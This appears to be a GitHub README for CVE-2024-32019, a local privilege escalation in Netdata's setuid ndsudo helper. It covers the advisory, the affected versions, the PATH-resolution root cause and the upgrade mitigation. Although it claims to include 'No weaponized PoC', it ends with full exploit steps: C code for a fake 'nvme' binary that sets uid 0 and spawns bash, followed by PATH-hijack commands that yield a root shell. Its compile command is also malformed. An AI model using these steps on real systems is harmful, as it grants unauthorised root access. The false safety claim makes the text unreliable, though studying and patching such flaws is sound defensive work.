## CVE-2024-32019 — Netdata `ndsudo` Local Privilege Escalation
### Summary
Netdata’s `ndsudo` helper (installed `setuid root`) restricts which commands it will run, but **resolves those commands using the caller’s `PATH`**. In impacted versions, a local user can place a malicious binary earlier in `PATH` and have `ndsudo` execute it with root privileges. **Patched in Netdata 1.45.3 and 1.45.0-169.**
### Affected / Patched
- **Affected:** `>= 1.44.0-60, < 1.45.0-169` and `>= 1.45.0, < 1.45.3` (per upstream advisory).
- **Fixed:** `1.45.3` (stable), `1.45.0-169` (nightly). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
### Impact
Local **privilege escalation to root** on systems where `ndsudo` is installed SUID and the user can invoke it (commonly members of the `netdata` group). [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)[GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
### Root Cause (high-level)
- `ndsudo` is SUID-root and whitelists subcommands like `nvme-list`, `nvme-smart-log`, etc.
- It calls external executables by name (e.g., `nvme`), which are resolved via **`PATH`** instead of using absolute paths or a safe, fixed search.
- If a writable directory appears before system paths, an attacker can introduce a look-alike binary that gets executed as root. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
### Safe Reproduction / Verification
This repository includes **non-exploit checkers** that:
- Inspect `/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo` (or wherever installed) for SUID/ownership.
- Enumerate `PATH` for **writable directories** earlier than common system paths.
- Confirm presence of whitelisted subcommand names that `ndsudo` might try to execute.
- Optionally run `ndsudo --test <subcommand>` to print the resolved command **without executing it** (use with caution, read code first). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
> ⚠️ **No weaponized PoC** is included. This project is for defenders and researchers to **assess exposure** and **validate patches** responsibly.
### Mitigation
- **Upgrade** Netdata to **1.45.3** (stable) or **1.45.0-169** (nightly).
- As a defense-in-depth measure, prefer **absolute paths** or sanitized minimal PATH in SUID helpers; avoid granting unnecessary `ndsudo` access. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)[wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
### Exploit Steps
###### 1. Save the following C code as `nvme.c`:
```C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
```
###### 2. Compile the Exploit
```bash
gcc nvme.c - nvme
```
###### 3. Environment Set-Up
```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```
###### 4. Modify the `PATH`
```bash
export PATH=/tmp/fakebin:$PATH
```
###### 5. Exploit Command
```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
### References
- NVD: CVE-2024-32019. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- Netdata Advisory (GHSA-pmhq-4cxq-wj93). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- Wiz summary. [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
- Snyk write-up. [Vulnerability Guide](https://security.snyk.io/vuln/SNYK-UNMANAGED-NETDATANETDATA-6613089)
- MITRE/CVE listing. [CVE](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=netdata)
[4.0K] /data/pocs/b9741c6f1f034447e0c514d5c0cdcdc65c65a548
├── [4.0K] checker_c
│ └── [1.4K] cve-2024-32019_check.c
├── [4.0K] checker_python
│ └── [2.7K] cve-2024-32019_check.py
└── [3.7K] README.md
2 directories, 3 files